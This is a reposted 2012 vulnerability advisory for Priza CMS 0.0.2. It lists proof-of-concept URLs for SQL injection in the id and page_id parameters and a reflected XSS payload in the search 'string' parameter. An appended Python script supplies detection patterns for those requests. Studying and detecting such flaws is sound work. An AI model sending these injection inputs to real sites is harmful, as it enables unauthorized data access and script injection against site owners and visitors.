Priza CMS Multiple Vulnerabilities and Fixes - Vulnerability Alert - Black Bar Safety Net

2012-01-08T00:00:00
ID MYHACK58:62201232842
Type myhack58
Reporter Anonymous
Modified 2012-01-08T00:00:00

Description

Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability

Author: BHG Security Center www.badguest.cn

Software address: http://www.priza.co.il/

Affected version: [0.0.2]

Test platform: ubuntu 11.04

Found by:

- Net. Edit0r (Net. edit0r [at] att [dot] net)

- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)

-----------------------------------------------------------------------------------------

Priza Israel Cms SQL Injection / XSS Multiple Vulnerability

-----------------------------------------------------------------------------------------

Author : BHG Security Center

---------------------------------------------------------------------------

PoC/Exploit:

~~~~~~~~~~

~ [PoC] ~: /website_path/index.asp?p_id=201&id=[SQLi]

~ [PoC] ~: /website_path/index.asp?page_id=[SQLi]

~ [PoC] ~: /website_path/volumes.asp?id=18

~ [PoC] ~: /website_path/index.asp?action=find&page_id=28&string=[Xss]

~~~~~~~~~~ Test

~ [PoC] ~: http://www.badguest.cn/path/index.asp?p_id=201&id=[SQLi]

~ [PoC] ~: http://www.badguest.cn/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script>

-------------------------------- [ EOF] ----------------------------------
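As an added defensive example (not part of the original advisory), the script below scans web-server log lines for requests that hit the Priza CMS endpoints and parameters listed above with SQL metacharacters or script tags. The log lines are constructed samples, and the IIS W3C field layout they follow is an assumption.

```python
import re
from urllib.parse import parse_qs

# Endpoints and parameters named in the advisory's PoC list.
WATCHED = {
    "/index.asp": {"id", "page_id", "string"},
    "/volumes.asp": {"id"},
}
# Broad indicators, not an exhaustive detection: quotes, comment markers
# and common keywords for SQLi; tag or event-handler syntax for XSS.
SQLI_RE = re.compile(r"""['"]|--|/\*|\bunion\b|\bselect\b""", re.I)
XSS_RE = re.compile(r"<\s*/?\s*script|javascript:|\bon\w+\s*=", re.I)


def classify_request(path, query):
    """Return (param, kind) findings for one request."""
    findings = []
    params = WATCHED.get(path.lower())
    if not params:
        return findings
    # parse_qs URL-decodes once, so %27 and %3C are inspected as ' and <.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() not in params:
            continue
        for value in values:
            if XSS_RE.search(value):
                findings.append((name, "xss"))
            elif SQLI_RE.search(value):
                findings.append((name, "sqli"))
    return findings


def scan_iis_log(lines):
    """Assumed layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:
            continue
        stem, query = fields[4], fields[5]
        for name, kind in classify_request(stem, "" if query == "-" else query):
            hits.append((stem, name, kind))
    return hits


# Constructed sample lines: the advisory's XSS payload and a lone quote in id.
SAMPLE_LOG = [
    "2012-01-08 10:00:01 10.0.0.5 GET /index.asp p_id=201&id=2 200",
    "2012-01-08 10:00:02 10.0.0.5 GET /index.asp p_id=201&id=2%27 500",
    "2012-01-08 10:00:03 10.0.0.5 GET /index.asp action=find&page_id=28&string=%22%3E%3Cscript%3Ealert(0)%3C/script%3E 200",
    "2012-01-08 10:00:04 10.0.0.5 GET /volumes.asp id=18 200",
    "2012-01-08 10:00:05 10.0.0.5 GET /about.asp id=1%27 200",
]
```

Requests to endpoints not in WATCHED are ignored, so the about.asp line produces no hit; tune the patterns before using them on a search parameter such as string, where quotes occur in legitimate input.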